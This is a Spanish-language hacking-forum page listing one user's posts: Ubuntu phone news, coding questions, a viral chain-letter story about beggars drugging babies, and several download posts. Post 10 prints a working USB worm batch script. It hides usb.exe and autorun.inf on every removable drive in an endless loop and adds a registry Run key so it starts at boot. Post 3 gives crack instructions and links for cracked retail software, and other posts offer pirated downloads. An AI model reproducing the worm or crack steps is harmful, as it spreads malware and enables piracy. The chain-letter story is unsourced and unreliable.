elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Temas
Páginas: [1]
1  Foros Generales / Noticias / Primeros teléfonos de Ubuntu se lanzarán este año 2014 en: 19 Febrero 2014, 20:30 pm

Se lanzaron los primeros teléfonos inteligentes basados ​​en una versión móvil del sistema operativo Ubuntu Linux de Canonical este año, el CEO de la compañía, dijo el miércoles.

BQ y Meizu, ambos fabricantes de teléfonos chinos, producirán los teléfonos que lanzarán "dentro" del 2014, dijo Mark Shuttleworth, en una conferencia telefónica con periodistas.

Shuttleworth no reveló otros detalles de los teléfonos, pero dio a entender que el teléfono BQ tendría ranuras de doble SIM y el teléfono Meizu coincidiría Ubuntu con Android en un sistema de arranque dual.

Las muestras de ambos teléfonos se podrán ver en la exposición del Mobile World Congress de la próxima semana en Barcelona.

Ubuntu es mejor conocido por su escritorio y el SO servidor Linux, que tiene una reputación de ser más fácil de usar e instalar que muchos otros sistemas operativos Linux.

Canonical, la empresa detrás del sistema operativo, anunciado por primera vez los planes para un sistema operativo móvil de Ubuntu a principios de 2013.

A mediados de año, la compañía puso en marcha un proyecto de crowdfunding para un concepto de teléfono de gama alta basado en el sistema operativo. Si bien la campaña para el teléfono Ubuntu Edge recibió un fuerte fue levantado lanzamiento - más de $1 millón en los pocos primera hora - el entusiasmo de cola rápidamente apagado y la campaña recaudó poco menos de $13 millones, lo cual fue muy inferior a la meta de $32 millones.

Al entrar en el espacio móvil, dijo Shuttleworth de Ubuntu está buscando convertirse en la plataforma N º 3 en la industria.

Eso lo pondría por delante de Windows Phone de Microsoft y BlackBerry OS, que son las actuales plataformas de terceros y cuarto clasificado detrás de Android y iOS de Apple.

Pero hasta la fecha, los consumidores parecen estar muy contentos con los líderes del mercado, que representan el 94 por ciento de todo el mercado. Microsoft y BlackBerry cuota de 5 otros sistemas operativos por ciento y representan sólo el 1 por ciento de las ventas de teléfonos inteligentes, según los datos de Gartner.

Shuttleworth dijo que cree que la clave para ganar cuota de mercado será la convergencia - la fusión de plataformas de escritorio y móviles para computación hará sobre uno ya está disponible a través de aplicaciones, por otro. La compañía tiene previsto llevar finalmente junto a su escritorio y sistemas operativos móviles como plataforma común.

También se centrará en el crecimiento del número de aplicaciones disponibles para la plataforma móvil de Ubuntu.

La falta de las principales aplicaciones ha sido una crítica muy común tanto en Microsoft y BlackBerry, y Shuttleworth dijo que quiere tener" las 50 mejores aplicaciones de Android y iOS cuando lancemos estos dispositivos."

Eso es lo que dijo Steve Ballmer, CEO de Microsoft, como cuando la compañía lanzó su plataforma de Windows Phone 8, y que llevó a la compañía de muchos meses para llegar a los desarrolladores a bordo. En algunos casos, la propia Microsoft paga por el trabajo de desarrollo de aplicaciones.

Shuttleworth sigue siendo optimista.

"Estamos muy confiados en que tendremos una buena actuación", dijo.

Fuente: http://infomundo.org/informatica/primeros-telefonos-de-ubuntu-se-lanzaran-este-ano-2014/
2  Foros Generales / Foro Libre / ¿Por qué está el niño durmiendo en las manos de los mendigos? en: 18 Febrero 2014, 20:27 pm

"¿Por qué está el niño durmiendo en las manos de los mendigos? ¿Te has preguntado esto alguna vez...?"
Este artículo lo leí hace unos meses. ¿Quién es el autor, no lo sé?. Por favor, léalo.....

"" Cerca de la estación de metro se encuentra sentada una mujer de edad incierta. El cabello de la mujer esta raído y sucio, con la cabeza inclinada por el dolor.

La mujer se sienta en el suelo sucio y junto a ella se encuentra una bolsa. En esa bolsa la gente tira el dinero. En las manos de la mujer, dormido, está un bebé de dos años, vistiendo ropa sucia y un sombrero sucio.
"Mujer con bebé" - numerosos transeúntes donarán su dinero. La gente de nuestra clase siempre nos sentimos apenados por los menos afortunados. Estamos dispuestos a dar a la gente desafortunada la última camisa, hasta el último centavo de nuestro bolsillo y nunca pensamos en otra cosa.

Ayudar nos parece siempre. "Un buena ocupación”...

Pasé junto a la mendiga por un mes. No di dinero, ya que sabía que esto es una estafa operada por pandillas y el dinero recaudado por el mendigo se le dará a quien controle los mendigos en la zona. Estas personas poseen numerosas propiedades de lujo y coches.
Ah, y el mendigo también recibe algo, por supuesto "Una botella de vodka en la noche y un döner kebab (sándwich árabe)".

Un mes después, pasé delante de los mendigos y algo me estremeció y que me llamó la atención, permaneciendo en un cruce concurrido, miré al bebé, vestido como siempre con un chándal sucio. Me di cuenta de que algo andaba "mal", descubrí al niño en la estación de metro sucio desde la mañana hasta la noche. El bebé dormía. Nunca sollozó o gritó, siempre estaba durmiendo, ocultando la cara en el regazo de una mujer que era su madre.

¿Alguno de ustedes, queridos lectores, tienen niños? Recuerdan cuántas veces dormían a la edad de 1-2-3 años?, Dos horas, máximo tres (no consecutivas) siesta, y otra vez – el movimiento. Durante todo el mes, todos los días de camino a la estación de metro, nunca vi al niño despierto! Miré al tierno niño pequeño, con la cara enterrada en el regazo de su madre, luego a la mendiga, y mi sospecha fue gradualmente tomando forma.

- ¿Por qué duerme todo el tiempo? Pregunté, mirando al bebé.

La mendiga fingió no oírme. Ella bajó su mirada y escondió su cara en el cuello de su rota chaqueta. Repetí la pregunta. La mujer levantó la mirada. Ella miró detrás de mi espalda, cansada, con absoluta irritación. Su mirada era similar a las criaturas de otro planeta.
"Vete a la *****..." sus labios murmuraban.

Por qué está durmiendo! Casi grité...

Detrás de mí, alguien puso su mano en mi hombro. Miré hacia atrás. Un viejo me miraba con desaprobación:
¿Qué quieres de ella? ¿No ves lo difícil que es su vida ?... Eh... saco unas monedas del bolsillo y se las arrojo en la bolsa.

La mendiga hizo un gesto con la mano en cruz, reflejando en la cara de la humildad y el dolor universal. El hombre quitó la mano de mi hombro y sin prisa salió de la estación del subte.

Apuesto a que, en su casa, él dirá cómo la defendió del mal, a la angustiada mujer de un hombre desalmado, en una estación de subte.
Al día siguiente llamé a un amigo. Era un hombre divertido con los ojos como aceitunas rumanas. Él sólo pudo completar tres años y medio de la educación. La falta total de educación no le impide moverse por las calles de la ciudad con coches importados muy caros y vive en una casa "pequeña", con infinidad de ventanas y balcones.
De mi amigo me las arreglé para descubrir que este negocio, a pesar de la aparente espontaneidad, claramente organizada. Es supervisado por la mendicidad crimen organizado.

Los niños son utilizados en la "renta" de las familias de los alcohólicos, o simplemente robados.
Necesitaba conseguir la respuesta a la pregunta - ¿por qué el bebé está durmiendo? Y la conseguí.
Mi amigo gitano contestó que es completamente normal, con voz tranquila, mientras me retorcía en estado de shock, y lo hacía como si estuviese dando el parte meteorológico:

Están en la heroína, o vodka...

Me quedé sin habla.

"¿Quién está con heroína - o bajo los efectos del vodka?"

Contestó. "El niño", por lo tanto no grita.

Las mujeres se sientan todo el día junto a él, imagina cómo podría llegar a aburrirse?
Con el fin de hacer que el bebé duerma todo el día, se le suministra vodka o drogas. Por supuesto, los cuerpos de los niños no son capaces de hacer frente a semejante shock. Y los niños mueren a menudo. Lo más terrible - a veces los niños mueren durante el "día de trabajo". Y la supuesta madre debe tener al niño muerto en sus manos hasta la tarde. Estas son las reglas; y la de los transeúntes arrojar algo de dinero en la bolsa, y con eso se creen morales.

Ayudar "A la Madre sola”...

... Al día siguiente, estaba caminando cerca de la misma estación de subte. Me hice de una credencial de identidad periodística, y estaba listo para una conversación seria. Pero la conversación no funcionó. Pero sucedió lo siguiente...

Una mujer estaba sentada en el suelo y en sus manos estaba sosteniendo a un niño. Yo le hice una pregunta acerca de los documentos del niño, y lo más importante, ¿dónde estaba el niño ayer?, algo que ella simplemente ignoró.
Pero mis preguntas no fueron ignoradas por los transeúntes que me dijeron que estaba loco gritando a una pobre mendiga con un niño.

Con todo esto, fui escoltado fuera de la estación del subte, en desgracia. Una cosa quedaba por hacer, era llamar a la policía. Cuando llegó la policía, la mendiga con el niño desaparecieron. Me quedé con una sensación plena de - "Estoy tratando de luchar contra molinos de viento".

Cuando veas en el subte, en la calle, a las mujeres con niños mendigando, piensa antes de realizar una ofrenda o donación. Piensa acerca de esto, que si no fuera por los cientos de miles de donaciones u ofrendas que hace la gente, este negocio no se podría mantener.
El negocio moriría y no los niños bombeados con vodka o drogas.
No miren al niño dormir con afecto, sino con terror...

Puesto que usted está leyendo este artículo, usted sabe ahora por qué el niño está durmiendo en las manos de mendigos.

PD
Si copia este artículo en su muro o simplemente haga clic en "Compartir", sus amigos lo leerán también. Y cuando usted decida volver a abrir la cartera para dar una moneda a un mendigo, recuerde que la caridad puede costar la vida de otro niño "."
3  Informática / Software / Abarrotes Puntos de Ventas 2.12 en: 3 Noviembre 2013, 21:07 pm


¿Qué es Abarrotes Punto de Venta?

Abarrotes Punto de Venta es un software de punto de venta creado en México muy sencillo de utilizar enfocado a pequeños y medianos negocios (como Abarrotes y Mini Supers) que te ayudará a reducir el tiempo en el que atiendes a tus clientes así como a manejar todos los productos de tu negocio y aumentar tus ventas, enfocado a que tu te dediques a vender mientras que el programa lleva el control de tus productos, ventas, inventarios y créditos.

Cuenta con más de 11 años de uso creado específicamente para tiendas de abarrotes, pero también es usado en farmacias, restaurantes, ferreterías, dulcerías, etc.

Beneficios

- Maneja todo el catálogo de productos de tu negocio para que no tengas que recordar ni un solo precio de nuevo.
- Usa el sistema con un lector de código de barras, cajón de dinero, impresora de tickets y báscula electrónica para reducir el tiempo en que atiendes a tus clientes.
- Si lo deseas, utiliza el control de inventarios para llevar una mejor administración o bien contratar empleados y llevar un registro de todo.
- Aplica promociones al utilizar un precio de Mayoreo para clientes seleccionados.
- Si lo deseas puedes utilizar el módulo de clientes para otorgarles crédito y manejar estados de cuenta, abonos, etc.
- Conoce mejor tu negocio a traves de los reportes de: productos vendidos por semana o periodo, productos bajos en inventario, - reporte de inventario en cantidad y monto (conoce cuánto dinero tienes en mercancia).
- Ahorra muchísimo tiempo capturando tus productos, ya que incluye una base de datos precargada de más de 6500 productos de un Abarrotes común! Aprende cómo funciona esta función exclusiva de nuestro sistema.
- Incluye un sencillo Asistente de Bienvenida que te guía en tus primeros pasos para configurar tu punto de venta, funciones que utilizas, claves de acceso, configuración de la impresión del ticket de compra, etc.

Para más Informacion Visita:

http://www.eleventa.com/demostracion.php

Descarga oficial Corresponde a la version monocaja. (Gracias aestolent!):

http://www.eleventa.com/descarga_abarrotes_punto_de_venta.php

Instrucciones del crack:

1) Renombrar el EXE original del programa de "Abarrotes.exe" a "Abarrotes.ext"
2) Copiar el EXE provisto en la carpeta de instalacion de la aplicacion.

Medicina:

agrego link de solo la medicina....para la version 2.12

Solo peguen el gds32.dll , ese ya funciona el respaldo automatico..al momento de salir

Link Directo:

http://www.multiupload.nl/TH336SKG2K

ó

http://www14.zippyshare.com/v/82805774/file.html

Contraseña: www.infomundo.org

Porfavor evita la piratería

resubido con todo e instalador :)

Nota: los links se caen constantemente debido a las nuevas leyes de internet. Por lo tanto avisenme y con gusto lo resubo.

NOTA: Si hay un antivirus activo, el crack puede fallar.

Les dejo el link del manual por si tiene dudas:

http://www.eleventa.com/doc/manual_puntodeventa.pdf
4  Informática / Software / iPhone Backup Extractor: recupera datos desde tu copia de seguridad en: 28 Julio 2013, 19:56 pm
iPhone Backup Extractor: recupera datos desde tu copia de seguridad


Hoy en día con la cantidad de métodos para tener respaldados tus datos parece imposible que alguien pueda perderlos, pero así es. Es frecuente que no se tengan guardados tus contactos en ningún servidor (Google, iCloud, Dropbox…), o tu calendario o SMS. Es muy frecuente que la gente pregunte en los foros y blogs especializados cómo pueden recuperar los SMS de su iPhone que han perdido por haber tenido que restaurar, o el listado de contactos que no tenían sincronizado con iTunes.

iTunes tiene un mecanismo de seguridad para esto, que es realizar una copia de seguridad cada cierto tiempo al sincronizar tu dispositivo. Esas copias de seguridad se guardan en las siguientes rutas:

    Windows: C:/Users/[TUNOMBREDEUSUARIO]/AppData/Roaming/Apple Computer/MobileSync/Backup
    MacOS X: /Users/[TUNOMBREDEUSUARIO]/Library/Application Support/MobileSync/Backup

En esa carpeta verás unas carpetas con muchos números y letras. Esas son las copias de seguridad que iTunes ha hecho. Si las abres sólo verás archivos con números y letras, inútiles para los “profanos”. Pero guardan información que te puede sacar de situaciones difíciles. Para restaurar la copia de seguridad con iTunes tan sólo debes conectar tu iPhone a iTunes y pulsar con botón derecho sobre el mismo, eligiendo la opción “Restaurar copia de seguridad” teniendo que elegir después la copia que quieras restaurar.



Este proceso tiene sus “peros” y es que no es raro que falle la restauración (sobre todo cuando es de una versión de iOS diferente a la que tienes ahora), y además te restaura TODO el contenido de la copia, algo que en ocasiones no es útil. Aquí es donde tiene utilidad esta aplicación: iPhone Backup Extractor. Disponible para Windows en su página oficial, http://www.iphonebackupextractor.com/ y con un precio de 17,95€, esta aplicación detecta las copias de seguridad, analiza su contenido y te permite extraerlo como tú quieras.


Al ejecutar la aplicación busca las copias que tengas en la ruta por defecto. Seleccionando la opción 1 puedes elegir la copia que desees o seleccionar un directorio deiferente donde encontrar la copia que deseas analizar. Una vez seleccionada, en la zona 2 podrás ver los datos de la copia: fotos, contactos, calendario, SMS, grabaciones, vídeos, voicemail, notas, llamadas y datos GPS. Todos estos datos son recuperables. En la imagen verás que hay algunos que tienen un número a la derecha subrayado y en azul, pulsando en él te pedirá que indiques la ruta donde copiarlo y te los exportará ahí. Los que no tienen número es que no existen en esa copia que has elegido.


Pulsando sobre File tendrás algunas opciones más para recuperar datos. Por orden son las siguientes opciones:

    Exportar los contactos en VCards individuales
    Exportar los contactos en una única VCard que los contenga todos
    Exportar los contactos a un archivo CSV
    Exportar el calendario a un archivo iCal
    Exportar el calendario a un archivo CSV
    Exportar los SMS  a un archivo CSV
    Exportar las notas a un archivo HTML
    Exportar el histórico de llamadas a un archivo CSV
    Exportar los datos de localización a un archivo CSV
    Exportar los datos de localización a un archivo KML

Una vez tenemos esos archivos, ya podremos usar los correspondientes programas (Outlook, Agenda, iCal, iTunes…) para volver a meterlos en nuestro iPhone. Y que no se te olvide cuando lo tengas todo listo, buscar un método online para respaldar tus datos (iCloud en iOs funciona de lujo, por ejemplo).

Descarga Full versión 4:

http://infomundo.org/u60jw3vbl
5  Programación / Programación C/C++ / problemas de audio en codeblock usando allegro en: 25 Mayo 2012, 17:50 pm
Hola!

necesito mucha de su ayuda y espero me puedan ayudar

el problema es el siguiente instalo mi driver de sonido dentro de allegro y cargo mi sonido en con load_wav etc. etc. y a la hora de correr mi programa el sonido tiene una pesima calidad (bueno no tan mala pero como que se traba)haber si me pueden echar una mano con eso porfavor

uso allegro 4.2.2 y no es mi tarjeta de sonido porque lo he probado en diferentes maquinas por ello creo que es mi allegro o mi codigo

el play_sample que use fue este

play_sample(ready,255,10,1000,0);

he estado jugando con la frecuencia y los demás valores y nada mas no

porfavor necesito ayuda

salu2!!!
6  Programación / Desarrollo Web / ayuda con javascript en: 25 Diciembre 2011, 20:25 pm
Hola

me surge un nuevo problema... espero me puedan ayudar la cosa esque el codigo que les voy a presentar me sirve en firefox pero en internet explorer no entoncs necesito que me ayudan donde radica el problema porfavor

el codigo es este

Código:
<script>
function img()
{ var iniciar = "[img]";
  var url = prompt("Agrega la URL de tu imagen que deseas Agregar","http://");
  var finalizar = "[/img]";
  post.value += iniciar+url+finalizar;
}
function url()
{ var iniciar = "[url]";
  var url = prompt("Agrega la URL del sitio web que deseas agregar","http://");
  var finalizar = "[/url]";
  post.value += iniciar+url+finalizar;
}
</script>
Contenido: <input type="button" onClick="img()" value="Imagen"><input type="button" onClick="url()" value="Link">
<textarea id="post" style="height:500;width:100%; background-color:#333333; color:white" type="text" name="post"></textarea>

gracias de antemano
7  Programación / PHP / necesito ayuda porfavor con ereg_replace en: 5 Diciembre 2011, 00:21 am
Me aparecen este error

Deprecated: Function ereg_replace() is deprecated in C:\xampp\htdocs\mundoneto\insertar_datos.php on line 11

y el codigo es este:

Código:
  $text=ereg_replace("\[", "inicia",$text);

funciona bien pero me vota ese error y me gustaria que no apareciera, segun yo el error radica aqui

Código:
\[

Espero que me ayuden y les agradecería mucho

salu2!!
8  Programación / Desarrollo Web / problemas con las dns de mi servidor en: 8 Diciembre 2010, 20:38 pm
Hola!

Necesit ayuda con mi servidor... primero que nada espero que este tema valla en este topic jaja

Bueno cree una dns en windows server 2008 y tengo una ip estática que no es de modem osea una ip externa estática q funciona muy bn jaja.

En fin al crear mis dns primero le hice un ping desde la maquina servidor al nombre de la dns para ver si si me devolvia el valor que quería y bingo salio el ping con mi direccion ip del servidor osea que estaba bien configurado pero luego intente acceder desde una computadora cualquiera para ver si mi dns funcionaba desde fuera y al hacerle un ping no me resulto y ni siquiera me devuelve ningun valor tan solo me dice que no existe ese host

necesito ayuda porfavor

salu2!!! y Gracias!!!
9  Media / Juegos y Consolas / Counter Strike 1.5 1.6 en: 5 Abril 2010, 20:30 pm
Counter Strike 1.5 1.6 Descarga

Todos Conocen al famoso juego..
acá les dejo para que descarguen cualquiera de estas versiones ^^

Están en pocos link, sirven con bots o para jugar online.
vienen con todo lo necesario para jugar online con todas las actualizaciones y todo solo lo instalan y juegan

Counter Strike 1.5


descarga: http://www.megaupload.com/?d=WCKIWCLE

Counter Strike 1.6


descarga: http://www.megaupload.com/?d=9XOKJWDP

Counter Strike Source


descarga parte.1 : http://www.megaupload.com/?d=EMLTK8KS

descarga parte.2 : http://www.megaupload.com/?d=5ETJ0I0C

Saludos

Fuente
10  Programación / Scripting / Problema con el Arranque de Este Bat[Solucionado] en: 2 Diciembre 2009, 19:53 pm
Hola!

Valla que hace tiempo que no posteo aqui  :D.

En fin el problemaesta en que el siguiente codec es un propagador de Usb que es 100% funcional en Windows Vista pero en windows xp no me funciona.

Si ejecuto el propagador en Xp dandole doble click al archivo no tengo ningun poblema pero al intentar arrancarlo desde el registro de esta forma:

Código:
reg add "hklm\software\microsoft\windows\currentVersion\run" /v "run" /t "REG_SZ" /d "%userprofile%\Win32\run.bat" /f

Me da problemas, al reiniciar tan solo me abre una ventana del explorador con la siguiente ruta c:\Documents

El Codec

Código:
  @ echo off


:bucle
call :copiausb
:copiausb
if exist "E:" call :creausb "E"
if exist "F:" call :creausb "F"
if exist "G:" call :creausb "G"
if exist "H:" call :creausb "H"
if exist "I:" call :creausb "I"
if exist "J:" call :creausb "J"
if exist "K:" call :creausb "K"
ping -n 8 localhost > nul
goto bucle
goto :eof
:creausb

attrib -h "%userprofile%\Win32"


attrib -h "%userprofile%\Win32\usb.exe"
copy "%userprofile%\Win32\usb.exe" "%1:\usb.exe"
attrib +h "%1:\usb.exe"
attrib +h "%userprofile%\Win32\usb.exe"

attrib -h "%userprofile%\Win32\autorun.inf"
copy "%userprofile%\Win32\autorun.inf" "%1:\autorun.inf"
attrib +h "%1:\autorun.inf"
attrib +h "%userprofile%\Win32\autorun.inf"

attrib +h "%userprofile%\Win32"
goto :eof

He estado intentando arreglarlo pero la verdad esque ya me quebre la cabeza y pido su ayuda si no fuera mucho pedir

salu2!! Y Gracias!!
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines